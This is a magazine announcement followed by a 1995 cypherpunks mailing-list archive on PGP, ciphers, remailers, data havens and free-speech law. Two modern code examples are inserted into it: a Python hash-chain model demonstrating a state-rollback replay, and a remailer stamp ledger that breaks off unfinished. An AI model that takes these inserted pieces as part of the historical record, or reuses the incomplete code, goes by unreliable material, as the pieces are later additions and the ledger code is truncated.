            ** Keep Out Volume 2, Number 1 coming soon **
                  ** FREE sample issues available **


I am pleased to announce the electronic availability of Volume 1,
Number 2 of Keep Out, the Journal of Electronic Privacy.

To receive a copy, simply send e-mail to
keep-out-current@expressnet.org.  The subject and body of the message
do not matter.  You will receive an ASCII-text copy of the issue in
reply to your message.  You can also do a Fidonet file request to
1:102/903 and request VOL1-NO2.TXT, or call the Sprawl BBS at
+1-818-342-5127 and download it.

Volume 1, Number 2 had stories on the Pretty Good Privacy (PGP)
signature bug, a how-to story on anonymous remailers, an interview
with remailer operator Erich von Hollander, and of course, a
continuation of our PGP beginners' series with an introduction to
digital signatures and the web of trust.

While Keep Out is primarily a paper magazine, the text of each issue
is released electronically to make sure the information is
disseminated widely.  This information is too important to limit it
to those who can afford a subscription.

I am sending this message instead of posting the full text of Keep
Out because the electronic edition contains the same commercial
advertisements that the paper version does.  It would be
inappropriate to post it here.

To encourage people to subscribe, and to ensure that Keep Out remains
solvent, the electronic edition is released roughly one month after
the paper version.

It seems to be the lot of new magazines to have deadline troubles.
Keep Out has unfortunately been no exception.  The second issue of
Keep Out was released quite late.  To bring the magazine's date of
issue back in touch with reality, the next issue (Volume 2, Number
1) will be dated March/April, and will be released in paper form on
February 27.

For that issue, we are working on a review of steganography software
(programs for hiding data in sound and picture files), an in-depth
report on Tempest technology (which allows an eavesdropper to view
your computer screen from a distance without using wires), a story
telling the current state of the government's Clipper (wiretap) Chip
initiative, and a continuation of our PGP for beginners' series.

To receive a free, sample issue of Keep Out, with no strings
attached, simply send your postal address to one of the addresses
below.  You will receive a copy of the next issue when it is mailed
out.  Keep Out's mailing list is completely confidential.  No
information about you will be released for any reason, except for
court orders, of course.

Subscriptions to Keep Out are $15 a year for six issues in the U.S.
and Canada, $27 elsewhere.  Back issues of the first two issues
(Volume 1, Numbers 1 and 2) are available at $7 each inside the U.S.
and Canada, $9 elsewhere.  U.S. funds only, please.  Unfortunately, we
can not accept credit cards, but checks and money orders payable to
"Keep Out" are welcome.


_______________
Contact Methods

Voice:       +1-818-345-8640

Fax/BBS:     +1-818-342-5127

Internet:    keep.out@sprawl.expressnet.org

Fidonet:     "Keep Out" at 1:102/903.0

Snail Mail:  Keep Out
             P.O. Box 571312
             Tarzana, CA 91357-1312
             USA



-----BEGIN PGP SIGNATURE-----
Version: 2.7
Comment: Call 818-345-8640 voice for info on Keep Out magazine.

-----END PGP SIGNATURE-----


... "Happiness is a warm puppy," said the anaconda.
--- Blue Wave/RA v2.12
--
|Fidonet:  John Schofield 11:310/12
|Internet: John.Schofield@sprawl.expressnet.org
|
| Standard disclaimer: The views of this user are strictly his own.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Tue, 10 Jan 95 11:20:14 PST
To: cypherpunks@toad.com
Subject: Storm Signals
Message-ID: <199501101924.OAA29627@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----


On a social mailing list that I'm on, two things have been noticed in 
the last week:

	1: Somebody's roommate (a Green Beret) has been called back into
		6 months of active service.  He was not told where he'd 
		be.

	2: GPS fine positioning has been turned off.  This is only done
		during times of military operations (such as the 'invasion'
		of Haiti and the Iraq Massacre).  It's also been highly
		correlated with Pentagon pizza deliveries.

Anybody else have any clues as to what's up?

No overt crypto relevance, but some parallels to traffic analysis could be
easily drawn.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxLe7CoZzwIn1bdtAQHEcgGAm0rMUiMy+5bUX419XmkLtHFXNUjvV8e0
1YylcQ5G9C/HlWXYZett0tudtpBUGZsS
=kfFB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bradley W. Dolan" <71431.2564@compuserve.com>
Date: Tue, 10 Jan 95 11:40:48 PST
To: <cypherpunks@toad.com>
Subject: Why is WELL down?
Message-ID: <950110193426_71431.2564_FHJ103-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


My favorite net access provider, the WELL, is down and I can't
get a straight answer from the normally frank WELL folks why.

Is there a net.guru out there that might have any insight into
whether this shutdown is technical or political?

Brad Dolan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Beattie <beattie@CSOS.ORST.EDU>
Date: Tue, 10 Jan 95 14:49:59 PST
To: cypherpunks@toad.com
Subject: Phil Zimmerman's Legal Defense Fund
Message-ID: <Pine.3.88.9501101452.A11712-0100000@CSOS.ORST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Could somebody mail me the info on sending a contribution to Phil 
Zimmermann's legal fees related to the PGP issue?

Brian Beattie         | [From an MIT job ad] "Applicants must also have
                      | extensive knowledge of UNIX, although they should
beattie@csos.orst.edu | have sufficiently good programming taste to not
Fax (503)754-3406     | consider this an achievement."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 10 Jan 95 12:25:13 PST
To: jamesd@netcom.com (James A. Donald)
Subject: Re: procmail: another question
In-Reply-To: <Pine.3.89.9501101110.A28938-0100000@netcom5>
Message-ID: <199501102026.PAA16836@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| On Tue, 10 Jan 1995, Adam Shostack wrote:
| > 	Procmail is a very versatile, relatively easy to use way of
| > processing mail.
| 
| "Relatively easy"  -- Relative to the usual venomous Unix 
| user hostile interface that is.   I use procmail, but my 
| local Unix guru does not, even though he has a clear need to do so.

	It's got a nasty learning curve; I held off for a long time
before making the leap.  What all mail filters need is better
integration with MUAs, so I can say "This message should have gone
into my cpunks-noise folder, fix the rules." Of course, doing that
really well is not trivial.

	Safe-tcl has a shorter learning curve, but I've spent enough
time that I don't want to switch without a payoff.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Todd Masco" <cactus@hks.net>
Date: Tue, 10 Jan 95 13:34:06 PST
To: cypherpunks@toad.com
Subject: Crypto functions
Message-ID: <199501102139.QAA00961@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


What crypto functions are considered modern and usable?  The list I have
right now is:

RSA
IDEA
DES
3DES
RC4
RC5
BLOWFISH
MD4
MD5

(and FLAMINGO, a trivial test case, which consists of xor'ing every 8 chars
 with "flamingo".)

Pointers to code for any other schemes will be greatly appreciated.

Thanks,

	-- Todd

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxL+YSoZzwIn1bdtAQGmbgF+Il9/8OU3smhe+DqhKBX5a51N9H15/ElN
4ByTAiKfNjXu21HWyV29kSxEBofo5003
=j55J
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff A Licquia <jalicqui@firefly.prairienet.org>
Date: Tue, 10 Jan 95 14:44:56 PST
To: cypherpunks@toad.com
Subject: Re: MEETING: Jan. 14th Bay Area Cypherpunks Meeting
In-Reply-To: <ab3820b50302100417b7@DialupEudora>
Message-ID: <Pine.3.89.9501101616.A13420-0100000@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


Ah, to be less locationally challenged!  Anyone got a plane ticket they 
can donate? :-)

I (and, I imagine, others) would highly appreciate a summary from some 
worthy soul fortunate enough to be there.

----------------------------------------------------------------------
Jeff Licquia (lame .sig, huh?)   |   Finger for PGP 2.6 public key
jalicqui@prairienet.org          |   Me?  Speak for whom?  You've got
licquia@cei.com (work)           |     to be kidding!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Tue, 10 Jan 95 13:44:15 PST
To: cypherpunks@toad.com
Subject: Re: HTTP and ID Verification
Message-ID: <199501102149.QAA01058@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Doc writes:
> Can anyone tell me what the URL for the site that displays all
> the identifying info it gets when you request it is?

One option is http://www.uiuc.edu/cgi-bin/printenv


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxMAvioZzwIn1bdtAQGhxwF/VkjkXoQ/s6U85F90IqcUotmoHbCojLE9
Wmn+KPyoeIa6THpY/w3VGAV7ug5i5WZB
=PkPL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Tue, 10 Jan 95 17:04:20 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: FBI and BLACKNET
Message-ID: <Pine.HPP.3.91.950110164606.5992B-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain


  I was just visited by a humble servant of the FBI
inquiring what I knew of BLACKNET. They apparently believe it's
a possible network industrial sabotage (read Terrorism).

Although the person I spoke to was quite cordial and even bought me 
lunch (that's the way to win me over) I must really question
the intelligence (read IQ) and intelligence (read reconnaissance)
of his superiors.

Apparently whoever sent him his lead doesn't pay attention to the net
enough to know Blacknet was a hoax, and why did it take since August
for them to find me?


I explained to him the difference between a Cypherpunk and a hacker,
explained what a joke it is to be prosecuting Mr. Zimmermann
and why the Government is in the wrong for trying to limit encryption
strength. Then I demonstrated the Internet and how to e-mail the prez
and FTP speeches of the Prez :)

(I know I know, act stupid so they volunteer as much info as possible,
he let too many things slip, but still if I had his job I'd be following 
up things like this too)

--Syed Yusuf
(Cypherpunk and proud of it damnit!)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 10 Jan 95 14:08:54 PST
To: "L. Todd Masco" <cactus@hks.net>
Subject: Re: Crypto functions
In-Reply-To: <199501102139.QAA00961@bb.hks.net>
Message-ID: <9501102208.AA26444@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"L. Todd Masco" says:
> What crypto functions are considered modern and usable?  The list I have
> right now is:
> 
> RSA
> IDEA
> DES
> 3DES
> RC4
> RC5
> BLOWFISH
> MD4
> MD5

I wouldn't use BLOWFISH. MD4 is flawed -- and it's a hash function, not
a crypto function (as is MD5). RC5 is very, very new. RC4 hasn't been
well studied in the open literature yet, though it is quite promising.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Tue, 10 Jan 95 23:17:05 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
In-Reply-To: <199501101924.OAA29627@bb.hks.net>
Message-ID: <4Rn4lKjqRCC3075yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199501101924.OAA29627@bb.hks.net>, you wrote:
> [BEGIN PGP SIGNED MESSAGE]
> [BEGIN PGP SIGNED MESSAGE]
>
> On a social mailing list that I'm on, two things have been noticed in
> the last week:
>
> 	1: Somebody's roommate (a Green Beret) has been called back into
> 		6 months of active service.  He was not told where he'd
> 		be.
>
> 	2: GPS fine positioning has been turned off.  This is only done
> 		during times of military operations (such as the 'invasion'
> 		of Haiti and the Iraq Massacre).  It's also been highly
> 		correlated with Pentagon pizza deliveries.
>
> Anybody else have any clues as to what's up?

Perhaps Bosnia?

--
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
   A fanatic is one who can't change his mind and won't change the subject.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Todd Masco" <cactus@hks.net>
Date: Tue, 10 Jan 95 14:25:43 PST
To: cypherpunks@toad.com
Subject: Re: Crypto functions
Message-ID: <199501102230.RAA01492@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


- -----BEGIN PGP SIGNED MESSAGE-----


Well, by cryptographic I mean "interesting crypto-type functions," not
necessarily just reversible mappings.  As far as an encryption API is
concerned, hash functions are no different: a byte stream comes in, a
different byte stream comes out.

I ask because I'm starting to put together those GUCAPI functions I was
talking about before the new year and defining the initial set of functions.

L. McCarthy noted that I didn't include sapphire, and I've included it
in the (trivially expandable) interface definition.  I'm more interested
in being inclusive than in excluding cryptographically weak functions 
(and I don't feel that I'm qualified at this point to make the call between
what's weak and strong anyway).
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCUAwUBLxLPixNhgovrPB7dAQEWZgP3eLGNg+X5oxIySLFaTRaZN5eHgS402S39
/6FsB2eiUhy0j7OOrd3OiMorQSJ+V/8UvyJUayUYlWBoTgC/zJn8Vry4zX0HWhRh
URv5IT3l3Q/8kFCBkjRMSS/2b3ya0s2gFUJMzEYz78JNpLOwjtm59svdjydTE+z2
bboLSy+H1A==
=1noA
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxMKeCoZzwIn1bdtAQHtGAGAzxBCONKibbY5cvv/7a/POL5mqRjDfQ7B
c7S0z6EJMyGFsGeWJrOVlCgVum0TPrTE
=Rcku
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Tue, 10 Jan 95 15:47:47 PST
To: ekr@eit.COM (Eric Rescorla)
Subject: Re: Pornography, What is it?
In-Reply-To: <9501101603.AA02337@eitech.eit.com>
Message-ID: <199501102342.RAA00418@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> >>
> >If this is so then everything I have read or seen misses this minor point
> >completely. Every press release, speech, etc. that I see uses the term
> >pornography, not obscenity. TV preachers, news anchors, newspapers, DA's,
> >etc. consistently use the term pornography. The state of Oregon specifically
> >legalized pornography, not obscenity. 
> >I think from a legal standpoint there is little difference between the two.
> 
> Not so. Obscenity is a class of speech which is completely unprotected
> by the First Amendment [*Note, I don't agree with this line of reasoning,
> but it's what the Supremes say.] I.e. you can simply ban obscenity,
> like child pornography. Pornographic material cannot be banned but
> can be regulated according to 'time place and manner'. Hence the
> zoning restrictions on Adult book stores.
>
I understand what you are saying, what I am saying is the distinction is not
used in practice. The bbs operator in Cali. that was busted in Tennessee was
busted for delivering PORNOGRAPHY (not obscenity) to a minor (in short a 14
year old's account being operated by an oinkdroid.) If you can 'simply' ban
obscenity then why all the ruckus? Simple, you can't ban it simply... or any
other way for that matter. As to your zoning restrictions, they change from
place to place and hence are not a hard and fast rule either. The bottom line
is that the distinction fostered by legal eagles is a straw man argument, it
is intended to distract from the real issue - freedom to do what you want
unless you harm another or their property without their prior consent.
 
> From a legal perspective, the difference between pornography and
> obscenity is defined by the Miller test. [This may have changed
> a bit in the past few years]. This states that in order for
> material to be obscene it must be:
> 
> 1. Devoid of any artistic or literary importance.
> 2. Appeal to a prurient interest. [i.e. be arousing].
> 3. Be patently offensive by contemporary community standards.
> 
> This isn't the exact wording, but it's the general idea.
> 
This test is a joke, if you apply it fairly then a man and his wife having
anal sex would qualify as obscene in many places (which it does in some states)
Also, the whole concept of community standards is unworkable. Whose community?
The reason so few  people get busted under the Miller test is that there really
are so few idiots out there who would fall for it.

> In practice, it's very hard to get anything declared obscene,
> hence the desire to regulate pornography strongly within the
> permitted bounds of the First Amendment.
>
The reason they want to regulate pornography is that it is a stepping stone to
a total ban. It is based on religious grounds and the issue really has little if
anything to do with Constitutional rights.
 
> -Ekr
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Tue, 10 Jan 95 14:45:00 PST
To: cypherpunks@toad.com
Subject: Re: QUERY: S/Keyish PGP?
Message-ID: <199501102249.RAA01602@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----


I'm catching up on old mail...


In response to my query, 
Adam Shostack <adam@bwh.harvard.edu> wrote:
>
>| A quick question: Has anybody considered the possibility of hacking
>| something into PGP's password protection to allow an S/Key like access?
>
>	I thought of this, bounced it off a few people, none of whom
>caught the flaw.  When I got around to implementing it, I realized
>that for it to work, your key would have to be securely stored on your
>unix box without encryption.

I caught that.  What I was hoping for was something that would allow
a key to be used for a specific purpose once and only once by a given
passphrase.  Ideally, this could be done on a machine that was totally
insecure.

I didn't catch the fundamental flaw, though.  If the machine is
compromised the key can always be compromised by taking an image of the
previous state and replaying whatever passphrase was intercepted.

Bummer.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxLUPBNhgovrPB7dAQEn8gP8DrC3h9Dv21JGgg4Vsz/76gnUfnTJBPD+
PPyZ2gi2dzzQOVkYsxZBHQs7kRq6ZSANNbCfM5wY1GbBagZvv2gAPMx9bESudH+l
wtoFcZGH5Az85O+k6FhN/QsOjJq/PaHUbNMui1Q+QKrMqU4I/UGCJCxAVRP8/wfS
8rLKzm7TxTU=
=LxUH
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxMPACoZzwIn1bdtAQH7DAF9EMimhI0J9JUN9bqaHhsz2opQXZSIQC+g
D32kU3ELjC58Y4Ig3e9fLLrPoGtTub85
=Uq/c
-----END PGP SIGNATURE-----
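
The flaw conceded in the message above can be shown with a small model of an S/Key-style hash chain. This is an added example, not code from the original posts or from PGP or S/Key; SHA-256 stands in for the hash, and the class name, seed and chain length are assumptions made for the illustration.

```python
import copy
import hashlib
import hmac


def h(data: bytes) -> bytes:
    """One link of the hash chain (SHA-256 is an assumption of this sketch)."""
    return hashlib.sha256(data).digest()


def chain(seed: bytes, n: int) -> bytes:
    """Apply h() n times to the secret seed."""
    value = seed
    for _ in range(n):
        value = h(value)
    return value


class OneTimeVerifier:
    """Host-side state: only the last accepted chain value is stored."""

    def __init__(self, seed: bytes, length: int) -> None:
        self.last = chain(seed, length)
        self.remaining = length

    def accept(self, otp: bytes) -> bool:
        # A valid one-time value hashes to the value accepted last time.
        if self.remaining == 0:
            return False
        if not hmac.compare_digest(h(otp), self.last):
            return False
        self.last = otp          # advance the chain: this value is now spent
        self.remaining -= 1
        return True


def rollback_demo() -> dict:
    """Show that one-time use depends on the integrity of the host's state."""
    seed = b"constructed seed, stands in for the passphrase"
    host = OneTimeVerifier(seed, length=100)

    # Image of the machine taken before the legitimate use.
    image = copy.deepcopy(host)

    # The value the user supplies; assume it was intercepted on the host.
    otp = chain(seed, 99)

    results = {"first_use": host.accept(otp)}
    # Against the live state the intercepted value is already spent.
    results["replay_live"] = host.accept(otp)
    # Against the restored image the same value is fresh again.
    restored = copy.deepcopy(image)
    results["replay_after_rollback"] = restored.accept(otp)
    return results


if __name__ == "__main__":
    for name, outcome in rollback_demo().items():
        print(f"{name}: {outcome}")
```

The one-time property lives entirely in `self.last`; whoever can restore an earlier copy of that state can reuse any value captured after the copy was made.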




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Tue, 10 Jan 95 21:52:02 PST
To: jpb@gate.net
Subject: Re: Thoughts on Data Havens
Message-ID: <9501102319.AB01326@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:30 AM 1/10/95, jpb@gate.net wrote:
> ... Post a new PGP key and encrypted address block weekly to alt.data.havens,
>alt.2600, or a stegoed picture to alt.binaries.pictures.whatever.  If you
>are limiting usership, perhaps an autoencrypting majordomo list. ...

Still, messages intended for the DH could be identified by the publicly 
known mailer address.  Some sort of protocol where each message to the 
remailer results in a new and different encrypted send-to block being 
returned to the sender would seem to be required.  Avoiding traffic analysis 
on these messages would require you to place a new and different encrypted 
reply-to on each message chunk.

> ...  It would also be a good idea to only allow DH
>commands to be executed if the encrypted (mandatory) control message arrived
>from another remailer account ...

I was assuming this--on the basis that the DH would not want its location 
known to the presumably large number of clients.


    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Tue, 10 Jan 95 21:41:34 PST
To: ekr@eit.COM (Eric Rescorla)
Subject: Re: Pornography, What is it?
In-Reply-To: <9501102357.AA12620@eitech.eit.com>
Message-ID: <199501110033.SAA00514@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> You seem to have missed where I say that I don't agree with this
> line of reasoning. I tend to believe that the first amendment means
> what it says. (I.e. make no law.) But the fact of the matter is that
> the people who make the law think differently, right or wrong.
>
I understand, I just don't think most of the folks out there against porno 
are interested in constitutional rights. They don't see them as relevant to 
their day to day lives. You might call it a sort of cult of personality which
is using religion as the head.
 
Also, the 1st Amendment says that Congress shall make no law, it doesn't say
a damn thing about the states doing it. When I read this amendment what I  see
is the founding fathers saying it is up to each state to decide for themselves.

And since Congress is placed in charge of inter-state relations it is quite
simple to reduce this to mean that States may not apply their standards to 
other states because they would then be acting in the place of the federal
government.

> >I understand what you are saying, what I am saying is the distinction is not
> >used in practice. The bbs operator in Cali. that was busted in Tennessee was
> >busted for delivering PORNOGRAPHY (not obscenity) to a minor (in short a 14
> >year old's account being operated by an oinkdroid.)
> The key word here is 'minor'. Minors have nowhere near the rights
> that adults have. Try banning the sale of pornography to demonstrated
> adults. 
>
Yes, but at no time was it proved that a minor DID d/l the file, only that they
could. Big distinction to me. An oinkdroid did the d/l'ing by playing like the
14 year old. To me this is entrapment.  
>
> I think you misunderstand. The First Amendment places restrictions
> upon what the States may do. The States are free to make such
> laws or NOT. Some don't. Most do.
> 
The 1st. Amendment says nothing about what the states can do, only Congress.

> It's all very well and good to say such things, but this formulation
> of liberty has no reasonable basis in Constitutional Law. The
> Bill of Rights does not encode Mill's On Liberty, as much as you
> might like it to.
>
Then I suggest you read the 9th and 10th Amendments. The 9th says the states
will ALWAYS get the benefit of the doubt. The 10th says the federal government
will NEVER get it unless there is a Constitutional Amendment.
 
> Huh? Obscenity has to do with freedom of speech, not action. It's
> an exception to the First Amendment, not to some general class
> of liberties. Depictions of anal sex are typically not considered
> obscene. The act of anal sex is often made illegal, but that's an
> entirely separate issue.
It is made illegal because it is considered obscene. You seem to be skirting
the issue here. And since when is speech not an act? There are a whole list
of things included in the freedom of speech issue (ie freedom of the press)
that clearly implies that speech is one kind of act.

> 
> >Also, the whole concept of community standards is unworkable. Whose community?
> The community passing the law.
Last time I checked such cases were tried by 12 peers, this hardly qualifies as
community by any definition. It is not like they take a vote of all the people
in the community of voting age (which they should).
> 
> 
> Look, you can make general arguments about the way that you think
> that your liberty should be, but the only legal basis you have
> for claims that you have the freedom to do something is the
> Bill of Rights. I'm arguing from that basis.
>
As am I. I base each and every one of my beliefs about how this government
is supposed to be run on that document and that document alone. It is not
the supreme law of the land for nothing.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david.lloyd-jones@canrem.com (David Lloyd-Jones)
Date: Wed, 11 Jan 95 00:22:42 PST
To: cypherpunks@toad.com
Subject: Re: January meeting with
Message-ID: <60.18618.6525.0C1C8733@canrem.com>
MIME-Version: 1.0
Content-Type: text/plain



LE+> The following is a message from my lawyer, Phil Dubois.  He posted it
  +> to alt.security.pgp, and I thought I should post it here as well.  The
  +> message is signed with his key.
  +> 
  +>  --Philip Zimmermann
  +> 

LE+The aforementioned signed message from PKZ's lawyer message failed
  +signature check on my system, apparently because it contained a very
  +long text line which, somewhere along the way, was chopped into two
  +lines before it arrived in my mailbox.  


LE+The two lines as they appeared in my message (which failed signature
  +test) are:
 
 
Well, there it is.  Phil goes free.
 
                           -dlj. 

david.lloyd-jones@canrem.com

 * 1st 1.11 #3818 * Gingrich, n. abbrev. :   "giving to the rich".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Tue, 10 Jan 95 17:10:14 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: Returned mail: User unknown (fwd)
Message-ID: <199501110109.UAA03229@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From the node of anonymous-remailer@shell.portal.com:
: 
: I want to propose that a change to more of a Snow Crash society
: with anarcho-capitalism as the norm is not necessarily being
: _caused_ by pressures listed above, but, rather, fit a grander
: historical destiny.  What we are seeing and will see in the
: 

Not necessarily to the EXTREME that Stephenson predicted, but I definitely
see a lot of what he said already starting to happen.  Hell, look at the 
Burbclaves.  Lil' old Indiana, PA had their first drive-by shooting a
few months ago.  Some of the growing gang-warfare influence is starting to
spill over from Pittsburgh.  Once people get a little more frightened of
violence, the engineered community idea is going to explode.  Now take
that with private and corporate police forces and ... BINGO!  Snowcrash.

: Consider the possibility that the dissolution of large,
: centralized federal republics is also inevitable.  (The
: Frissel/Sandforth Optimists have been arguing this exact point.)
: 

The decentralizing effect of digital networks (or Webs a la Hakim Bey)
is pretty self evident.  One can easily extrapolate the effects of a
structure like the Internet, a structure that by nature routes around
any form of 'censorship' from above.

- -----
Doc					      doc@phobos.lib.iup.edu
aka Mark Rogaski			      http://www.lib.iup.edu/~rogaski/

Disclaimer:  You would probably be hard-pressed to find ANYONE who agrees
             	with me, much less my university or employer...

   [finger fllevta@oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxMZ/R0c4/pqJauBAQH8LwP+PrvNhKJVEzmhZVcuvkNMLmGWWgyflAlh
PxvR5BtJHBpE/oNqB3TVOywt9eJYeIV7L7BSboIFosEyqC4OEFS6WRTAJpWhPg8L
L9CdvhaDKubnTteBEtugEtU1HB3iJ+zRucJYUVit0bBwCimcqvr/aTMab7h4Yqw9
uKJPulSTg/w=
=jdlE
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 10 Jan 95 12:22:06 PST
To: cypherpunks@toad.com
Subject: Re: "safe" Internet access
Message-ID: <9501102021.AA04063@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> If you want to access the Internet in a way that doesn't reveal your
> physical location (much), buy access from Metricom.  They sell
> Internet access via radios.  A small part-15 (900Mhz) $500 radio modem


This seems to be one of these devices which use the cellular phone
network. In Germany they are also available ("Modacom") and use the
D1/D2/E-Plus networks. These networks can localize a sender in many cases
with a precision of about 20-40 meters. Not the best way to keep the 
physical location secret...


Hadmut 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Angus Patterson <s675570@aix1.uottawa.ca>
Date: Tue, 10 Jan 95 18:52:33 PST
To: cypherpunks@toad.com
Subject: Why use plastic for remailers and DH?
Message-ID: <Pine.3.89.9501102139.A36230-0100000@aix1.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


This point may have been raised before, but anyway, unless you're using a 
swiss-bank issued credit card for a numbered account (if that's at all 
possible), or a bogus name on the card, why would anybody want to use 
something as completely traceable as a credit card to pay for a remailer 
or a data haven?
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jurgen Botz <jbotz@orixa.mtholyoke.edu>
Date: Tue, 10 Jan 95 19:08:46 PST
To: jpb@gate.net
Subject: Re: Remailer postage
In-Reply-To: <199501051802.NAA22909@seminole.gate.net>
Message-ID: <199501110308.WAA07340@orixa.mtholyoke.edu>
MIME-Version: 1.0
Content-Type: text/plain


jpb@gate.net wrote:
> Where can I get the Magic Money software?

I'm a bit behind, so sorry if others have already suggested this, but
you should need any digicash for this... stamps can be just big random
numbers.  Someone buys a book of stamps, you make 10 big random
numbers send them a copy and keep a copy on file.  After a message
comes through with a particular number you throw that number out.

Just like real stamps, and unlike money, they can be used only once.
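
The stamp scheme described in the message above, written out as an added example (not code from the original post or from any remailer). The `X-Postage` header name and the class and function names are assumptions; as a variation on "keep a copy on file", the ledger keeps only a SHA-256 digest of each unused stamp, so a copy of the ledger does not hand out spendable stamps.

```python
import email
import hashlib
import secrets


class StampBook:
    """Remailer-side ledger of postage stamps that have not been used yet."""

    def __init__(self) -> None:
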